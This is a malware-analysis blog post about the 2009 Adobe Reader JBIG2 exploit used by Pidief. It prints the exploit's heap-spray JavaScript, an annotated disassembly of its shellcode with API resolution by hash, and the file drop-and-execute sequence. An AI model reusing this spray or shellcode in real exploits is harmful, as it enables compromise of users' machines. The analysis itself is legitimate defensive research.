Analysing the PDF Exploit

I want to present my results from my analysis of the Adobe PDF Exploit from March 2009. It allows to execute any Win32 code due to a bug in the jbig2 compression. The bug has currently (date 3rd March 2009) been fixed only internally, but Adobe wants to provide an update on March 11th. There are all Adobe Reader versions since 2007 vulnerable (Adobe Reader 7.0 and higher are affected). The percentage of exploiting PDFs that use this bug is very low, it is not wide spread.

Overview to the PDF file

So let's give an overview what an exploiting PDF file contains:

There are the three main parts for exploiting a PDF: The JavaScript Code, the Shellcode and the Exploit Code. All are the same important for the exploit to work.

A famous well-known and wide spread virus family is Pidief (also the virus analysed here). In its history it used various exploits in Adobe PDFs to execute malware. Following analysis is forced to the actual version of Pidief. Enjoy!

JavaScript Code

Pidief contains at first JavaScript code, stored as script / java script object in the PDF file. The script is oct encoded and looks like:

2 0 obj
<</S /JavaScript
/JS (\040\012\012\040\040\040\040\040\040\040\040\146\165\156\143\164\151\157\156\040\160\162\151\156\164\111\156\146\157\050\051\173\012\040\040\040\040\040\040\040\040\040\040\040\040\143\157\156\163\157\154\145\056\160\162\151\156\164\154\156\050\042\126\151\145\167\145\162\040\154\141\156\147\165\141\147\145\072\040\042\040\053\040\141\160\160\056\154\141\156\147\165\141\147\145\051\073\012\040\040\040\040\040\040\040\040\040\040\040\040\143\157\156\163\157\154\145\056\160\162\151\156\164\154\156\050\042\126\151\145\167\145\162\040\166\1
...
>>
endobj

The script is quite big, it is decrypted 42792 bytes long (but the main part of the script contains the Shellcode). Before showing the decrypted java code, I want briefly explain how JavaScript code is executed in PDFs. Adobe uses its own internal engine, so everyone who thinks IE: nope. JavaScript is executed on different actions (triggers). A german document from Adobe says there are 7 actions to execute JavaScript, here is the first one, Open Document, used. So this gives an important limitation, JavaScripts execution in PDF is dependent on actions. Following code registers the JavaScript to be executed when opening the document:

3 0 obj
<</Type /Catalog
/Outlines 4 0 R
/Pages 5 0 R
/OpenAction 2 0 R
>>
endobj

OpenAction defines to execute object reference 2 0 (compare with the above script object). The original JavaScript code (which is above oct encoded):

        function printInfo(){
            console.println("Viewer language: " + app.language);
            console.println("Viewer version: " + app.viewerVersion);
            console.println("Viewer Type: " + app.viewerType);
            console.println("Viewer Variatio: " + app.viewerVariation);
            console.println("Dumping all data objects in the document.");
            if ( this.external )
            {
            console.println("viewing from a browser.");
            }
            else
            {
            console.println("viewing in the Acrobat application.");
            }

            ...

The script contains just two functions: printInfo() and sprayWindows(). The first one just outputs information about the PDF viewer (for debug only), the second one places the Shellcode into memory and prepares the memory. As previously mentioned, the script is 42794 bytes long, but just 150 lines long, which makes it easy to read. Interestingly the JavaScript code contains also comments:

	// Create a 1MB string of NOP instructions followed by shellcode:
	//
	// malloc header   string length   NOP slide   shellcode   NULL terminator
	// 32 bytes        4 bytes         x bytes     y bytes     2 bytes
	
	    while (pointers.length <= 0x100000/2) 
		pointers += pointers;
	//Pointers
	    pointers = pointers.substring(0, 0x100000/2 - 32/2 - 4/2 - pointers1.length - 2/2 );

	    while (nop.length <= 0x100000/2)
		nop += nop;	
	//Trampolin
	    nop = nop.substring(0, 0x100000/2 - 32/2 - 4/2 - jmp.length - 2/2);

//	    while (nop1.length <= 0x100000/2)
//		nop1 += nop1;	
	//shelcode <1M
//	    nop1 = nop1.substring(0, 0x100000/2 - 32/2 - 4/2 - shellcode.length - 2/2 );

How the Exploit works

Like always, the PDF exploit works by using (exploiting) a bug in the software (Adobe Reader). A common technique is for example the "Buffer Overflow", trying to overflow a buffer on stack and overwrite return jump addresses to point to data. This is also used here, in connection with a bug in jbig2 compression. The JavaScript code allocates 200 MB and fills it with NOPs (no operation, an assembly opcode) and the Shellcode. Later then there is a bug in jbig2 compression which leads to execute somewhere at in the 200 MB buffer. This is why there are so many NOPs, the exact entry point may differ so the NOPs will be executed up to the Shellcode. Here the code which allocates 200 MB:

	    var x = new Array();
	
	    // Fill 200MB of memory with copies of the NOP slide and shellcode
	    for (i = 0; i < 150; i++) { 
		x[i] = nop+shellcode;
	    }
//	    x[i++] = nop1+shellcode;

	    for (; i < 201; i++) { 
		x[i] = pointers + pointers1;
	    }

It is very interesting that there is different code for Adobe Reader 9 and Adobe Reader 7.0 (and upper), to let the exploit working on different versions:

        if(app.viewerVersion>=7.0&app.viewerVersion<9)
        {

Shellcode

The JavaScript code places the Shellcode in the memory in order to be executed by a bug in Adobe Reader. The Shellcode itself is valid Win32 code, stored JavaScript escaped in the JavaScript. Here we leave JavaScript engine, and enter Windows. In the first 4 bytes, the Shellcode contains an abbreviation "JBIA" which results in 4 valid but junk code instructions at the beginning. So lets remember and callback the target of the shellcode: To extract and execute the two executables from the PDF. Let's take a look at the initial code:

; [junk code] - "JBIA"
00000000  4A                dec edx
00000001  42                inc edx
00000002  49                dec ecx
00000003  41                inc ecx

; create data on stack (284 bytes)
00000004  81EC20010000      sub esp,288
0000000A  8BFC              mov edi,esp
0000000C  83C704            add edi,4                                           ; edi is a pointer to the new allocated data

; store the hashes of Windows API functions for later usage
0000000F  C7073274910C      mov dword [edi],0xc917432                           ; LoadLibraryA
00000015  C747048E130AAC    mov dword [edi+0x4],0xac0a138e                      ; GetFileSize
0000001C  C7470839E27D83    mov dword [edi+0x8],0x837de239                      ; GetTempPathA
00000023  C7470C8FF21861    mov dword [edi+0xc],0x6118f28f                      ; TerminateProcess
0000002A  C747109332E494    mov dword [edi+0x10],0x94e43293                     ; CreateFileA
00000031  C74714A932E494    mov dword [edi+0x14],0x94e432a9                     ; CreateFileW
00000038  C7471843BEACDB    mov dword [edi+0x18],0xdbacbe43                     ; SetFilePointer
0000003F  C7471CB2360F13    mov dword [edi+0x1c],0x130f36b2                     ; ReadFile
00000046  C74720C48D1F74    mov dword [edi+0x20],0x741f8dc4                     ; WriteFile
0000004D  C74724512FA201    mov dword [edi+0x24],0x1a22f51                      ; WinExec
00000054  C7472857660DFF    mov dword [edi+0x28],0xff0d6657                     ; CloseHandle
0000005B  C7472C9B878BE5    mov dword [edi+0x2c],0xe58b879b                     ; GetCommandLineA
00000062  C74730EDAFFFB4    mov dword [edi+0x30],0xb4ffafed                     ; GetModuleFileNameA

; call the code following this instruction
00000069  E997020000        jmp dword Execute_Function

..

Execute_Function:
00000305  E864FDFFFF        call Execute_Shellcode                              ; just for obfuscation, this will never return

So what there is done is that function name hashes are stored on stack and an cheap obfuscation call is done. The jmp instruction jumps to a call which calls the code following the jmp instruction, so you could remove the jmp and call instruction and it would have the same effect. At the very beginning the code resolves its hashes to function addresses:

Execute_Shellcode:

; Arguments:
;   edi = pointer to the data/code stored on stack

0000006E  64A130000000      mov eax,[fs:0x30]                                   ; get a pointer to the Process Environment Block
00000074  8B400C            mov eax,[eax+12]                                    ; get a pointer to PEB_LDR_DATA structure
00000077  8B701C            mov esi,[eax+28]                                    ; -> PEB_LDR_DATA.InInitializationOrderModuleList.LDR_DATA_TABLE_ENTRY/LDR_MODULE   (UNDOCUMENTED)
0000007A  AD                lodsd                                               ; double linked list, Forward link, to LDR_DATA_TABLE_ENTRY / LDR_MODULE structure  (UNDOCUMENTED)
0000007B  8B6808            mov ebp,[eax+8]                                     ; DllBase (Module Base Address)                                                     (UNDOCUMENTED)

; resolve the 13 function hashes
0000007E  8BF7              mov esi,edi                                         ; esi points to the first hash to resolve
00000080  6A0D              push byte 13                                        ; loop 13 times
00000082  59                pop ecx                                             ; ecx is counter
Resolve_Hashes:
00000083  E838020000        call dword ResolveImportsByHashes
00000088  E2F9              loop Resolve_Hashes
ResolveImportsByHashes:

; resolves function hashes

;   ebp = Module Address
;   edi = pointer to hash to resolve and exchange with functions address

; store register contents
000002C0  51                push ecx
000002C1  56                push esi

000002C2  8B753C            mov esi,[ebp+0x3C]                                  ; -> PE Header (skip DOS Header)
000002C5  8B742E78          mov esi,[esi+ebp+0x78]                              ; Export Table Virtual Address
000002C9  03F5              add esi,ebp                                         ;   (absolute address)

000002CB  56                push esi                                            ; store address of Export Directory Table
000002CC  8B7620            mov esi,[esi+0x20]                                  ; Name Pointer RVA (list of all functions)
000002CF  03F5              add esi,ebp                                         ;   (absolute address)
000002D1  33C9              xor ecx,ecx
000002D3  49                dec ecx                                             ; ecx is name counter

Function_Name_loop:
000002D4  41                inc ecx                                             ; -> next function name
000002D5  AD                lodsd                                               ; get the address of the function name
000002D6  03C5              add eax,ebp                                         ;   (absolute address)
000002D8  33DB              xor ebx,ebx                                         ; reset next hash to generate

Generate_Hash_of_Function_Name:
000002DA  0FBE10            movsx edx,byte [eax]                                ; load next character
000002DD  3AD6              cmp dl,dh                                           ; zero terminator?
000002DF  7408              jz Generated_Hash
000002E1  C1CB07            ror ebx,7                                           ; => this is hash generating algorithm  hash += char >> 7
000002E4  03DA              add ebx,edx                                         ;  (add the shifted character to generating hash)
000002E6  40                inc eax                                             ; -> next character
000002E7  EBF1              jmp short Generate_Hash_of_Function_Name

Generated_Hash:
000002E9  3B1F              cmp ebx,[edi]                                       ; matches the input hash with generated one?
000002EB  75E7              jnz Function_Name_loop                              ; if not compare against next function

000002ED  5E                pop esi                                             ; restore address of Export Directory Table
000002EE  8B5E24            mov ebx,[esi+0x24]                                  ; Ordinal Table
000002F1  03DD              add ebx,ebp                                         ;   (absolute address)
000002F3  668B0C4B          mov cx,[ebx+ecx*2]                                  ; look up the function in the Ordinal Table to get the ordinal number
000002F7  8B5E1C            mov ebx,[esi+0x1c]                                  ; Export Address Table
000002FA  03DD              add ebx,ebp                                         ;   (absolute address)
000002FC  8B048B            mov eax,[ebx+ecx*4]                                 ; -> look up the Address of the function (ordinal number in EAT)
000002FF  03C5              add eax,ebp                                         ;   (absolute address)
00000301  AB                stosd                                               ; overwrite the input hash with the address

; restore register contents
00000302  5E                pop esi
00000303  59                pop ecx

00000304  C3                ret

There is the typical ResolveImportsByHashes function that is part of every malware - compare it with Sinowal. And like every resolve function this function uses a ror 7 to generate the hash (very typical). The rest of the code is not that exciting, just standard API calls. Like on Sinowal Analysis I do not want to spam around with code, so following is the list of calls:

Kernel32!GetFileSize(FileHandle +4, NULL);
  done in a loop, in order to get the size of every file and compare it with fixed PDF file size
  to get the file handle of the pdf file

Kernel32!GetTempPathA(Stack Buffer, 256 bytes);
  returns temp path, where the 2 executables will be stored to

appending "\SVCHOST.EXE" to the temp path

Kernel32!CreateFileA("C:\Windows\Temp\SVCHOST.EXE", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
  creates the first file in the temp path

Kernel32!SetFilePointer(PDF File Handle, File Position = where the string is, NULL, FILE_BEGIN);
  sets file pointer in PDF file to a special configuration block

Kernel32!ReadFile(PDF File Handle, Buffer, 48 Bytes, &NumberOfBytesRead, NULL);
  reads the configuration block (30h bytes)

Kernel32!SetFilePointer(PDF File Handle, File Position, NULL, FILE_BEGIN);
  sets the file pointer to the position of the to-extract file in the PDF file, received from the configuration block

Kernel32!ReadFile(PDF File Handle, Buffer, 1024 Bytes, &NumberOfBytesRead, NULL);
Kernel32!WriteFile(PDF File Handle, Read File Buffer, 1024 Bytes, &NumberOfBytesWritten, NULL);
  both done in a loop to read the whole first file
  directly after read the file (buffer) will be decrypted with xor 97h

Kernel32!CloseHandle(Created File);

Kernel32!WinExec(Created File Name, 0);
  the malware will be executed


strcat(Temp Path, "\temp.exe");
  second files name is temp.exe

Kernel32!CreateFileA(Second File Name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
  also created in the temp directory

Kernel32!SetFilePointer(PDF File Handle, File Position = somewhere in the file, NULL, FILE_BEGIN);
  at this time the file position is hard wired coded

Kernel32!ReadFile(PDF File Handle, Buffer, 1024 Bytes, &NumberOfBytesRead, NULL);
Kernel32!WriteFile(PDF File Handle, Read File Buffer, 1024 Bytes, &NumberOfBytesWritten, NULL);
  again both done in a loop to read the whole second file
  directly after read the file (buffer) will be decrypted with at this time xor A0h

Kernel32!SetFilePointer(Created File Handle, File Position = 9000h, NULL, FILE_BEGIN);
  the file pointer of the second file will be moved to that position

Kernel32!WriteFile(PDF File Handle, previously read configuration buffer, 40 Bytes, &NumberOfBytesWritten, NULL);
  and the configuration block written

Kernel32!CloseHandle(Created File);

Kernel32!WinExec(Created Second File Name, 0);
  also this file will be executed


Kernel32!CloseHandle(Created File);

** programming error with this call making the process crashing

Kernel32!TerminateProcess(Current Process, Exit Code = 0);
  will never be executed but should smoothly terminate Adobe Reader

  ...and that's it!

Configuration Block

As mentioned, the PDF file contains a configuration block which is 40 bytes big. The shellcode uses two variables of it, where the first file lays at in the PDF and how long it is. Furthermore the configuration block will be copied into the second file. The configuration block is hard wired at position 171984 in the pdf file and contains following bytes:

00029FD0  41 41 49 20 41 4D 4F 53 20 31 31 2D 30 32 2D 30  AAI AMOS 11-02-0
00029FE0  39 2E 70 64 66 00 00 74 00 78 78 78 78 78 78 78  9.pdf..t.xxxxxxx
00029FF0  78 78 78 78 78 78 78 78 C8 B0 04 00 FC 47 03 00  xxxxxxxxȰ..G..

The next to last dword, 0004B0C8, is the target primary file size (307400 bytes). The last dword 000347FC is the position of the file within the pdf file, but 0x2a000 and 0xb000 are added at runtime to get the position.

Programming Errors in Pidief

I encountered various bugs in the Shellcode of Pidief:

Also the code is not very effective and could have been written better. And it contains junk instructions and redundant code.

Affected Systems

All Windows XP with Adobe Reader 7.0 or higher before March 11 2009 date are affected. March 11 because that's the day when Adobe Systems wants to release a security fix for Adobe Reader. Furthermore JavaScript must be enabled in Adobe Reader (which is per default activated). In the link below Adobe Systems tells how to deactivate it in the preferences.

I can not currently say if Vista is affected too, I'm not sure until the Process Environment Block and LDR data structures are used which heavily change from Windows to Windows versions. Also its not said what the malware executables do and how they are Vista compatible, I'll review it later.

Downloads

Download the Pidief Shellcode under here. For any other information or file wanted please send me a request.

Conclusion

PDF Exploits are quite nice, but also difficult to find. As virus writer you would need to take a very close look to Adobe Reader to find one, but if found, it is worth a few thousand euro (up to 10.000 on the market). Remember as end-user to keep your Adobe Reader always updated (use the latest version) and turn automatic updates on.

References